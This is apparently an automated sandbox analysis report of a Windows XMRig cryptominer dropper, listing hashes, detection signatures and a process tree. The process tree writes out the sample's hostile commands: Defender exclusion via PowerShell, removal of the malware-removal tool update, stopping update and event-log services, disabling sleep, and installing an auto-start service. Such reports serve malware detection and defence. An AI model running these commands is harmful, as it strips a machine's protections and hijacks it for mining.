Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 08:12
Static task
static1
Behavioral task
behavioral1
Sample
29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe
Resource
win7-20241010-en
General
-
Target
29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe
-
Size
5.6MB
-
MD5
9eac0dcb631fbb15b4936c202e2fed61
-
SHA1
32b46ba2ea419bec6a9453145f9ad360c8470c48
-
SHA256
29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0
-
SHA512
ec5727810a34b4ac06b15a3e7679746fee704de970c0d18ec2835a84382b332025bc965874580b69536392d108d842f0f1237a84ca77d07e610818e6f1ab31ec
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/H1:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgp
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1812-62-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-63-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-65-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-66-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-68-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-67-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-69-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-70-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-71-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-72-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-73-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1812-74-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2896 powershell.exe 1832 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 4440 fqwofdtexigy.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4108 powercfg.exe 5000 powercfg.exe 3172 powercfg.exe 3792 powercfg.exe 920 powercfg.exe 1192 powercfg.exe 4588 powercfg.exe 732 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4440 set thread context of 664 4440 fqwofdtexigy.exe 144 PID 4440 set thread context of 1812 4440 fqwofdtexigy.exe 149 -
resource yara_rule behavioral2/memory/1812-58-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-62-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-63-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-61-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-59-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-60-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-57-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-65-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-66-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-68-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-67-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-69-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-70-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-71-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-72-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-73-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1812-74-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2356 sc.exe 964 sc.exe 2112 sc.exe 2068 sc.exe 3704 sc.exe 4988 sc.exe 1360 sc.exe 2168 sc.exe 3308 sc.exe 4732 sc.exe 4448 sc.exe 3020 sc.exe 4800 sc.exe 1568 sc.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 2896 powershell.exe 2896 powershell.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 872 29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe 4440 fqwofdtexigy.exe 1832 powershell.exe 1832 powershell.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 4440 fqwofdtexigy.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe 1812 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2896 powershell.exe Token: SeShutdownPrivilege 732 powercfg.exe Token: SeCreatePagefilePrivilege 732 powercfg.exe Token: SeShutdownPrivilege 1192 powercfg.exe Token: SeCreatePagefilePrivilege 1192 powercfg.exe Token: SeShutdownPrivilege 4588 powercfg.exe Token: SeCreatePagefilePrivilege 4588 powercfg.exe Token: SeShutdownPrivilege 4108 powercfg.exe Token: SeCreatePagefilePrivilege 4108 powercfg.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeShutdownPrivilege 3792 powercfg.exe Token: SeCreatePagefilePrivilege 3792 powercfg.exe Token: SeShutdownPrivilege 3172 powercfg.exe Token: SeCreatePagefilePrivilege 3172 powercfg.exe Token: SeShutdownPrivilege 5000 powercfg.exe Token: SeCreatePagefilePrivilege 5000 powercfg.exe Token: SeShutdownPrivilege 920 powercfg.exe Token: SeCreatePagefilePrivilege 920 powercfg.exe Token: SeLockMemoryPrivilege 1812 nslookup.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4536 wrote to memory of 4008 4536 cmd.exe 97 PID 4536 wrote to memory of 4008 4536 cmd.exe 97 PID 2284 wrote to memory of 2208 2284 cmd.exe 124 PID 2284 wrote to memory of 2208 2284 cmd.exe 124 PID 3932 wrote to memory of 2928 3932 cmd.exe 133 PID 3932 wrote to memory of 2928 3932 cmd.exe 133 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 664 4440 fqwofdtexigy.exe 144 PID 4440 wrote to memory of 1812 4440 fqwofdtexigy.exe 149 PID 4440 wrote to memory of 1812 4440 fqwofdtexigy.exe 149 PID 4440 wrote to memory of 1812 4440 fqwofdtexigy.exe 149 PID 4440 wrote to memory of 1812 4440 fqwofdtexigy.exe 149 PID 4440 wrote to memory of 1812 4440 fqwofdtexigy.exe 149
Processes
-
C:\Users\Admin\AppData\Local\Temp\29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe"C:\Users\Admin\AppData\Local\Temp\29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:872 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4008
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2168
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:964
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3308
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3020
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4732
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:732
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:4800
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:3704
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:2068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\29f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2208
-
-
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2928
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4988
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2356
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1568
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4448
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1360
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:664
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD59eac0dcb631fbb15b4936c202e2fed61
SHA132b46ba2ea419bec6a9453145f9ad360c8470c48
SHA25629f4228e9359c9a0fbfb5767e4e22a9ab1d5c825d9a99e033dea566d7eeb01b0
SHA512ec5727810a34b4ac06b15a3e7679746fee704de970c0d18ec2835a84382b332025bc965874580b69536392d108d842f0f1237a84ca77d07e610818e6f1ab31ec
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82